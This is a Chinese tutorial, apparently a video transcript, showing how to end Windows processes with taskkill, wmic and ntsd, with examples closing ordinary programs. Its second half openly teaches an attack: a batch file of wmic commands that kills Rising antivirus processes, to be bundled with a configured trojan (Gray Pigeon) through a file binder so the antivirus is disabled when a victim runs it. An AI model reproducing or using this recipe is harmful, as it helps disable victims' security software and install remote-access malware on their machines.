1、用taskill命令
①taskkill /im
进程名称
示例:用taskkill /im
VStart.exe命令关闭音速启动,VStart.exe就是音速启动的进程名称,下面看操作,执行了三次,成功关闭了音速启动,再看下面的方法.
②taskkill /pid[进程码]
-t(结束该进程)
-f(强制结束该进程以及所有子进程)
注:有两种方法查进程的PID码:
①在命令行下用 tasklist 命令查出进程的PID号码,就是这些
②在任务管理器中的查看选项中选择选择列中勾先PID那一项
示例:举个关闭迅雷的例子,先找出迅雷的PID码2552 taskkill /pid 2552 -f,就是这个指令,下面来运行一下看看.
2、用 wmic process where
name="进程名称" call terminate
这个不需要知道进程的PID号
示例: wmic process where
name="iexplore.exe" call terminate 关闭IE浏览器,我们来运行一下这条指令看看.看到了吧浏览器已经关闭了,再看下面的.
3、ntsd -c q -p
[pid进程码]
示例:还是举个关闭迅雷的吧,同样先找出迅雷的PID码2724
ntsd
-c q -p 2724 是这条指令,下面我们来执行一下看看.看到了吧,迅雷已经关闭了.
这样关进程有什么作用呢?
一方面遇到不能用任务管理器结束的进程可以试试上面的方法,而且用wmic process where name="进程名称" call terminate和taskkill /im 进程名称这两条可以同时关闭多个进程名相同的进程,举个关2个QQ的例子吧,已经打开了两个QQ程序,wmic process where name="QQ.exe" call terminate,我们来执行一下看看,看到了吧,两个QQ都关闭了.
另一方面我们利用上面的命令可以做个关杀毒软件的批处理,然后把批处理文件和木马捆绑在一起,这样运行木马的时候就关闭了杀毒软件,下面看我操作
1、先建立一个关闭杀毒软件进程的批处理文件,这里我以关闭瑞星为例,说明一下我的瑞星已
经关闭了监控系统,所以这些就不用了:
wmic process where
name="RavTask.exe" call terminate
wmic process where
name="CCenter.exe" call terminate
wmic process where
name="RavmonD.exe" call terminate
wmic process where
name="Ravmon.exe" call terminate
wmic process where
name="RavStub.exe" call terminate
2、配置一个木马,配个鸽子吧
3、用文件捆绑器将批处理文件和木马捆绑到一起,这里我随便找个文件捆绑器,不是免杀的.